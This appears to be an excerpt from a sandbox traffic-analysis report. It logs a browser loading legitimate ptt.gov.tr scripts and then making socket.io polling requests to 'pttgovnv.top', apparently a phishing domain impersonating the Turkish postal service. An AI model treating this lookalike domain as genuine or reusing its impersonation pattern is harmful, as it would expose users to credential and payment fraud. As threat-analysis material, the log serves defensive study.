          2024-09-01 22:25:36 UTC1390INData Raw: 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 74 29 7d 61 2b 3d 22 26 70 61 67 65 5f 6f 72 69 67 69 6e 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 29 3b 76 61 72 20 6f 2c 69 3d 6e 75 6c 6c 2c 74 3d 6e 75 6c 6c 3b 69 66 28 65 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 26 26 28 74 68 69 73 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 3d 65 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 2c 74 68 69 73 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 5f 6e 61 6d 65 3d 65 2e 63 6c 69 65 6e 74 5f 6e 61 6d 65 2c 74 68 69 73 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 5f 65 6d 61 69 6c 3d 65 2e 63
          Data Ascii: {console.log(t)}a+="&page_origin="+encodeURIComponent(window.location.origin);var o,i=null,t=null;if(e.scheduled_auto_start&&(this.scheduled_auto_start=e.scheduled_auto_start,this.scheduled_auto_start_name=e.client_name,this.scheduled_auto_start_email=e.c
          2024-09-01 22:25:36 UTC1390INData Raw: 69 66 72 61 6d 65 3d 7b 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 74 2b 22 2f 63 6f 6e 74 65 6e 74 2f 22 2b 65 2e 63 75 73 74 6f 6d 69 7a 65 64 5f 68 74 6d 6c 2b 22 3f 22 2b 61 7d 3a 74 68 69 73 2e 69 66 72 61 6d 65 3d 7b 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 74 2b 22 2f 63 6f 6e 74 65 6e 74 2f 73 70 61 2e 68 74 6d 6c 3f 22 2b 61 7d 7d 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 2c 68 3d 64 6f 63 75 6d 65 6e 74 2e 55 52 4c 3b 6c 65 74 20 6c 3d 21 31 2c 63 3d 21 31 3b 66 6f 72 28 63 75 72 55 52 4c 20 6f 66 5b 22 61 6c 6f 2d 74 65 63 68 2e 63 6f 6d 22 2c 22 63 61 6c 6c 63 65 6e 74 65 72 73 74 75 64 69 6f 2e 63 6f 6d 22 2c 22 6d 75 73 74 65 72 69 68 69 7a 6d 65 74 6c 65 72 69 2e 63 6f 6d 22 5d 29 68 26 26 30 3c 3d 68 2e 69
          Data Ascii: iframe={src:"https://"+t+"/content/"+e.customized_html+"?"+a}:this.iframe={src:"https://"+t+"/content/spa.html?"+a}}var n=document.referrer,h=document.URL;let l=!1,c=!1;for(curURL of["alo-tech.com","callcenterstudio.com","musterihizmetleri.com"])h&&0<=h.i
          2024-09-01 22:25:36 UTC1390INData Raw: 5f 67 65 74 48 65 69 67 68 74 28 65 2e 77 69 64 67 65 74 48 65 69 67 68 74 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 61 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 63 68 61 74 5f 67 65 74 57 69 64 74 68 28 65 2e 77 69 64 67 65 74 57 69 64 74 68 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 4d 4f 42 49 4c 45 5f 53 43 52 45 45 4e 26 26 28 73 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 72 69 67 68 74 22 2c 22 30 70 78 22 2c 22 69 6d 70 6f 72 74 61 6e 74 22 29 2c 73 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 62 6f 74 74 6f 6d 22 2c 22 30 70 78 22 2c 22 69 6d 70 6f 72 74 61 6e 74 22 29 2c 61 63 6a 73 5f 6e 65 61 72 5f 6c 65 66 74 26 26 73 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 6c 65 66 74 22
          Data Ascii: _getHeight(e.widgetHeight.toString()+"px"),a.style.width=chat_getWidth(e.widgetWidth.toString()+"px"),MOBILE_SCREEN&&(s.style.setProperty("right","0px","important"),s.style.setProperty("bottom","0px","important"),acjs_near_left&&s.style.setProperty("left"
          2024-09-01 22:25:36 UTC1390INData Raw: 28 29 7b 73 2e 73 74 79 6c 65 2e 62 6f 78 53 68 61 64 6f 77 3d 22 30 70 78 20 30 70 78 20 35 70 78 20 30 70 78 20 23 38 38 38 38 38 38 64 36 22 7d 2c 34 30 30 29 29 2c 22 6d 61 78 69 6d 69 73 65 22 3d 3d 3d 65 2e 63 68 61 6e 67 65 54 79 70 65 3f 28 73 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 63 68 61 74 5f 67 65 74 48 65 69 67 68 74 28 65 2e 77 69 64 67 65 74 48 65 69 67 68 74 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 73 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 63 68 61 74 5f 67 65 74 57 69 64 74 68 28 65 2e 77 69 64 67 65 74 57 69 64 74 68 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 61 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 63 68 61 74 5f 67 65 74 48 65 69 67 68 74 28 65 2e 77 69 64 67 65 74 48 65 69 67 68 74 2e 74 6f 53 74 72 69
          Data Ascii: (){s.style.boxShadow="0px 0px 5px 0px #888888d6"},400)),"maximise"===e.changeType?(s.style.height=chat_getHeight(e.widgetHeight.toString()+"px"),s.style.width=chat_getWidth(e.widgetWidth.toString()+"px"),a.style.height=chat_getHeight(e.widgetHeight.toStri
          2024-09-01 22:25:36 UTC1390INData Raw: 65 6e 74 5f 6e 61 6d 65 3a 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 63 6c 69 65 6e 74 5f 6e 61 6d 65 22 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 2e 68 6f 73 74 6e 61 6d 65 29 2c 63 6c 69 65 6e 74 5f 65 6d 61 69 6c 3a 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 63 6c 69 65 6e 74 5f 65 6d 61 69 6c 22 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 2e 68 6f 73 74 6e 61 6d 65 29 2c 70 68 6f 6e 65 5f 6e 75 6d 62 65 72 3a 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 70 68 6f 6e 65 5f 6e 75 6d 62 65 72 22 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 2e 68 6f 73 74 6e 61 6d 65 29 7d 29 2c 22 63 75 73 74 6f 6d 65 72 5f 68 69 73 74 6f 72 79 22 69 6e 20 41 6c 6f 43 68 61 74 2e 70 61 72 61 6d 73 26 26 41 6c 6f 43 68 61 74 2e 70 61 72
          Data Ascii: ent_name:aloTechGetCookie("client_name",e.alotech_data.hostname),client_email:aloTechGetCookie("client_email",e.alotech_data.hostname),phone_number:aloTechGetCookie("phone_number",e.alotech_data.hostname)}),"customer_history"in AloChat.params&&AloChat.par
          2024-09-01 22:25:36 UTC1390INData Raw: 6c 6c 28 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 29 2c 6e 3d 30 3b 6e 3c 69 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 5b 6e 5d 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 66 72 61 6d 65 22 29 26 26 76 6f 69 64 20 30 3d 3d 3d 68 26 26 28 68 3d 69 5b 6e 5d 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 66 72 61 6d 65 22 29 29 3b 76 61 72 20 6c 2c 63 3d 22 22 3b 66 6f 72 28 6c 20 69 6e 20 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 29 61 6c 6f 54 65 63 68 53 65 74 43 6f 6f 6b 69 65 28 6c 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 5b 6c 5d 2c 22 63 6c 69 65 6e 74 5f 6e 61 6d 65 22 3d 3d 3d 6c 7c 7c 22 63 6c 69 65 6e 74 5f 65 6d 61 69 6c 22 3d 3d 3d 6c 7c 7c 22 70 68 6f 6e 65 5f 6e 75 6d 62 65 72 22 3d 3d 3d 6c 3f 37 33 30 3a 31 2c
          Data Ascii: ll(".alotech-chat-body"),n=0;n<i.length;n++)i[n].querySelector("iframe")&&void 0===h&&(h=i[n].querySelector("iframe"));var l,c="";for(l in e.alotech_data)aloTechSetCookie(l,e.alotech_data[l],"client_name"===l||"client_email"===l||"phone_number"===l?730:1,


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          141192.168.2.449879185.220.152.26443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:36 UTC599OUTGET /_next/static/chunks/main-8430b752c8e66574.js HTTP/1.1
          Host: www.ptt.gov.tr
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: script
          Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:36 UTC401INHTTP/1.1 200 OK
          Cache-Control: public, max-age=31536000, immutable
          Keep-Alive: timeout=5
          Content-Type: application/javascript; charset=UTF-8
          Last-Modified: Thu, 22 Aug 2024 07:07:16 GMT
          Accept-Ranges: bytes
          ETag: W/"1a4f9-19178e938a0"
          Vary: Accept-Encoding
          Date: Sun, 01 Sep 2024 22:25:36 GMT
          Content-Length: 107769
          Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
          2024-09-01 22:25:36 UTC6870INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 37 39 5d 2c 7b 33 37 33 35 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 22 74 72 69 6d 53 74 61 72 74 22 69 6e 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 28 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 53 74 61 72 74 3d 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 4c 65 66 74 29 2c 22 74 72 69 6d 45 6e 64 22 69 6e 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 28 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 45 6e 64 3d 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 52 69 67 68 74 29 2c 22 64 65 73 63
          Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{3735:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"desc
          2024-09-01 22:25:36 UTC7271INData Raw: 63 6f 6d 70 6c 65 74 69 6f 6e 3b 69 66 28 22 74 68 72 6f 77 22 3d 3d 3d 6e 2e 74 79 70 65 29 7b 76 61 72 20 6f 3d 6e 2e 61 72 67 3b 45 28 72 29 7d 72 65 74 75 72 6e 20 6f 7d 7d 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 69 6c 6c 65 67 61 6c 20 63 61 74 63 68 20 61 74 74 65 6d 70 74 22 29 7d 2c 64 65 6c 65 67 61 74 65 59 69 65 6c 64 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 64 65 6c 65 67 61 74 65 3d 7b 69 74 65 72 61 74 6f 72 3a 52 28 65 29 2c 72 65 73 75 6c 74 4e 61 6d 65 3a 72 2c 6e 65 78 74 4c 6f 63 3a 6e 7d 2c 22 6e 65 78 74 22 3d 3d 3d 74 68 69 73 2e 6d 65 74 68 6f 64 26 26 28 74 68 69 73 2e 61 72 67 3d 74 29 2c 68 7d 7d 2c 65 7d 28 65 2e 65 78 70 6f 72 74 73 29 3b 74 72 79 7b 72 65 67 65 6e 65 72
          Data Ascii: completion;if("throw"===n.type){var o=n.arg;E(r)}return o}}throw new Error("illegal catch attempt")},delegateYield:function(e,r,n){return this.delegate={iterator:R(e),resultName:r,nextLoc:n},"next"===this.method&&(this.arg=t),h}},e}(e.exports);try{regener
          2024-09-01 22:25:36 UTC7271INData Raw: 65 2c 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 26 26 72 28 74 2c 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 29 7b 76 61 72 20 6e 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 29 3b 69 66 28 6e 26 26 21 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 29 29 7b 76 61 72 20 6f 3d 74 2e 63 6c 6f 6e 65 4e 6f 64 65 28 21 30 29 3b 72 65 74 75 72 6e 20 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 2c 22 22 29 2c 6f 2e 6e 6f 6e 63 65 3d 6e 2c 6e 3d 3d 3d 65 2e 6e 6f 6e 63 65 26 26 65 2e 69 73 45 71 75 61 6c 4e 6f 64 65 28 6f 29 7d 7d 72 65 74 75 72 6e 20 65 2e 69 73 45 71 75 61 6c 4e 6f 64 65 28 74 29 7d 74 2e 44 4f 4d 41 74 74 72 69 62 75 74 65 4e 61 6d 65 73 3d 6e 2c 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79
          Data Ascii: e,HTMLElement)&&r(t,HTMLElement)){var n=t.getAttribute("nonce");if(n&&!e.getAttribute("nonce")){var o=t.cloneNode(!0);return o.setAttribute("nonce",""),o.nonce=n,n===e.nonce&&e.isEqualNode(o)}}return e.isEqualNode(t)}t.DOMAttributeNames=n,("function"===ty
          2024-09-01 22:25:36 UTC7271INData Raw: 75 6c 6c 3d 3d 61 3f 69 3a 61 2c 6c 61 62 65 6c 3a 22 6d 61 72 6b 22 3d 3d 3d 75 7c 7c 22 6d 65 61 73 75 72 65 22 3d 3d 3d 75 3f 22 63 75 73 74 6f 6d 22 3a 22 77 65 62 2d 76 69 74 61 6c 22 7d 3b 6e 75 6c 6c 3d 3d 3d 63 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 7c 7c 63 28 66 29 2c 41 2e 74 72 61 63 6b 57 65 62 56 69 74 61 6c 4d 65 74 72 69 63 28 66 29 7d 2c 65 2e 6e 65 78 74 3d 31 35 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 35 3a 72 65 74 75 72 6e 20 65 2e 6e 65 78 74 3d 31 37 2c 57 2e 72 6f 75 74 65 4c 6f 61 64 65 72 2e 77 68 65 6e 45 6e 74 72 79 70 6f 69 6e 74 28 71 2e 70 61 67 65 29 3b 63 61 73 65 20 31 37 3a 65 2e 74 30 3d 65 2e 73 65 6e 74 3b 63 61 73 65 20 31 38 3a 69 66 28 21 28 22 65 72 72 6f 72 22 69 6e 28 6c 3d 65 2e 74 30 29 29 29 7b 65 2e 6e 65 78 74
          Data Ascii: ull==a?i:a,label:"mark"===u||"measure"===u?"custom":"web-vital"};null===c||void 0===c||c(f),A.trackWebVitalMetric(f)},e.next=15;break;case 15:return e.next=17,W.routeLoader.whenEntrypoint(q.page);case 17:e.t0=e.sent;case 18:if(!("error"in(l=e.t0))){e.next
          2024-09-01 22:25:36 UTC7271INData Raw: 3d 74 2e 64 65 66 61 75 6c 74 29 26 26 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2e 64 65 66 61 75 6c 74 2c 74 29 2c 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 65 66 61 75 6c 74 29 7d 2c 32 35 36 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 65 6e 64 73 57 69 74 68 28 22 2f 22 29 26 26 22 2f 22 21 3d 3d 65 3f 65 2e 73 6c 69 63 65 28 30 2c 2d 31 29 3a 65 7d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 72 65 6d 6f 76 65 50 61 74 68 54 72 61 69 6c 69 6e 67 53 6c 61 73 68 3d 72 2c 74 2e 6e 6f 72 6d 61 6c 69 7a 65 50 61 74 68 54 72 61 69 6c 69
          Data Ascii: =t.default)&&(Object.assign(t.default,t),e.exports=t.default)},2564:function(e,t){"use strict";function r(e){return e.endsWith("/")&&"/"!==e?e.slice(0,-1):e}Object.defineProperty(t,"__esModule",{value:!0}),t.removePathTrailingSlash=r,t.normalizePathTraili
          2024-09-01 22:25:36 UTC7271INData Raw: 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 6d 61 72 6b 41 73 73 65 74 45 72 72 6f 72 3d 6c 2c 74 2e 69 73 41 73 73 65 74 45 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 63 20 69 6e 20 65 7d 2c 74 2e 67 65 74 43 6c 69 65 6e 74 42 75 69 6c 64 4d 61 6e 69 66 65 73 74 3d 66 2c 74 2e 67 65 74 4d 69 64 64 6c 65 77 61 72 65 4d 61 6e 69 66 65 73 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 73 65 6c 66 2e 5f 5f 4d 49 44 44 4c 45 57 41 52 45 5f 4d 41 4e 49 46 45 53 54 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 65 6c 66 2e 5f 5f 4d 49 44 44 4c 45 57 41 52 45 5f 4d 41 4e 49 46 45 53 54 29 3b 72 65 74 75 72 6e 20 73 28 6e 65 77 20 50 72 6f 6d 69 73
          Data Ascii: y(t,"__esModule",{value:!0}),t.markAssetError=l,t.isAssetError=function(e){return e&&c in e},t.getClientBuildManifest=f,t.getMiddlewareManifest=function(){if(self.__MIDDLEWARE_MANIFEST)return Promise.resolve(self.__MIDDLEWARE_MANIFEST);return s(new Promis
          2024-09-01 22:25:36 UTC7271INData Raw: 75 72 6e 20 6c 2e 64 65 66 61 75 6c 74 2e 65 76 65 6e 74 73 7d 7d 29 2c 79 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 68 2c 65 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 28 29 5b 65 5d 7d 7d 29 7d 29 29 2c 6d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 68 5b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 72 3d 6e 65 77 20 41 72 72 61 79 28 74 29 2c 6e 3d 30 3b 6e 3c 74 3b 6e 2b 2b 29 72 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 76 61 72 20 6f 2c 61 3d 76 28 29 3b 72 65 74 75 72 6e 28 6f 3d 61 29 5b 65 5d 2e 61 70 70 6c 79 28 6f 2c
          Data Ascii: urn l.default.events}}),y.forEach((function(e){Object.defineProperty(h,e,{get:function(){return v()[e]}})})),m.forEach((function(e){h[e]=function(){for(var t=arguments.length,r=new Array(t),n=0;n<t;n++)r[n]=arguments[n];var o,a=v();return(o=a)[e].apply(o,
          2024-09-01 22:25:36 UTC7271INData Raw: 3d 65 2e 67 65 74 49 6e 69 74 69 61 6c 50 72 6f 70 73 2c 74 2e 6f 72 69 67 47 65 74 49 6e 69 74 69 61 6c 50 72 6f 70 73 3d 65 2e 6f 72 69 67 47 65 74 49 6e 69 74 69 61 6c 50 72 6f 70 73 2c 21 31 3b 72 65 74 75 72 6e 20 74 7d 3b 76 61 72 20 6e 2c 6f 3d 28 6e 3d 72 28 32 34 36 36 29 29 26 26 6e 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 6e 3a 7b 64 65 66 61 75 6c 74 3a 6e 7d 2c 61 3d 72 28 35 36 37 30 29 3b 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61 75 6c 74 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61 75 6c 74 26 26 6e 75 6c 6c 21 3d 3d 74 2e 64 65 66 61 75 6c 74 29 26 26 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2e 64 65 66 61 75 6c 74 2c 74 29 2c 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64
          Data Ascii: =e.getInitialProps,t.origGetInitialProps=e.origGetInitialProps,!1;return t};var n,o=(n=r(2466))&&n.__esModule?n:{default:n},a=r(5670);("function"===typeof t.default||"object"===typeof t.default&&null!==t.default)&&(Object.assign(t.default,t),e.exports=t.d
          2024-09-01 22:25:36 UTC7271INData Raw: 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 22 2c 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 22 5d 2e 73 6f 6d 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 70 72 6f 70 73 2e 68 72 65 66 2e 73 74 61 72 74 73 57 69 74 68 28 74 29 7d 29 29 29 7b 76 61 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 2c 6f 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 67 65 74
          Data Ascii: ://fonts.googleapis.com/css","https://use.typekit.net/"].some((function(t){return e.props.href.startsWith(t)}))){var i=function(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{},o=Object.keys(r);"function"===typeof Object.get
          2024-09-01 22:25:36 UTC7271INData Raw: 72 29 3a 7b 7d 3b 6e 2e 67 65 74 7c 7c 6e 2e 73 65 74 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 72 2c 6e 29 3a 74 5b 72 5d 3d 65 5b 72 5d 7d 72 65 74 75 72 6e 20 74 2e 64 65 66 61 75 6c 74 3d 65 2c 74 7d 28 72 28 32 31 31 32 29 29 2c 76 3d 72 28 35 39 38 37 29 2c 67 3d 72 28 36 30 39 39 29 2c 62 3d 6b 28 72 28 38 31 31 31 29 29 2c 77 3d 72 28 35 35 36 39 29 2c 5f 3d 72 28 33 39 29 2c 50 3d 72 28 36 31 30 36 29 2c 53 3d 72 28 35 30 39 39 29 2c 78 3d 6b 28 72 28 32 34 33 31 29 29 2c 4f 3d 72 28 39 32 36 36 29 2c 45 3d 72 28 38 36 31 35 29 2c 6a 3d 72 28 37 31 31 36 29 2c 52 3d 72 28 32 34 34 36 29 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65
          Data Ascii: r):{};n.get||n.set?Object.defineProperty(t,r,n):t[r]=e[r]}return t.default=e,t}(r(2112)),v=r(5987),g=r(6099),b=k(r(8111)),w=r(5569),_=r(39),P=r(6106),S=r(5099),x=k(r(2431)),O=r(9266),E=r(8615),j=r(7116),R=r(2446);function k(e){return e&&e.__esModule?e:{de


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          142192.168.2.449887172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:36 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P6liOuY&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:36 UTC605INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:36 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UxdNbZYpGr61%2FqOiDvMWspR6sEw12JAdNMMIf7fAG2gic0bVJjTmJkwHvPkeLwE1fKCDE6HK8OukwkV1%2Bguj4KKbw%2F2eNvevHH4aKp4%2F3pQH4KE0i4TlAW4axCoEqxQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad5c4987c32f-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:36 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
          Data Ascii: 29{"code":1,"message":"Session ID unknown"}
          2024-09-01 22:25:36 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          143192.168.2.449888104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:36 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liOkF&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:36 UTC577INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:36 GMT
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iGpaMzFKkcfrLtkLX4%2FeGHQnvBxPQ%2FNPzFpzfU%2FqlAGuJPyvHgg03AapQl37HFf%2Bvw4sc9jKVWdwYvuPnoxazpk%2B7%2F2E5glAC9wgzzRLTGCeQ0fRiHydKywFATKzknE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad5c3ac84277-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:36 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          144192.168.2.449889104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
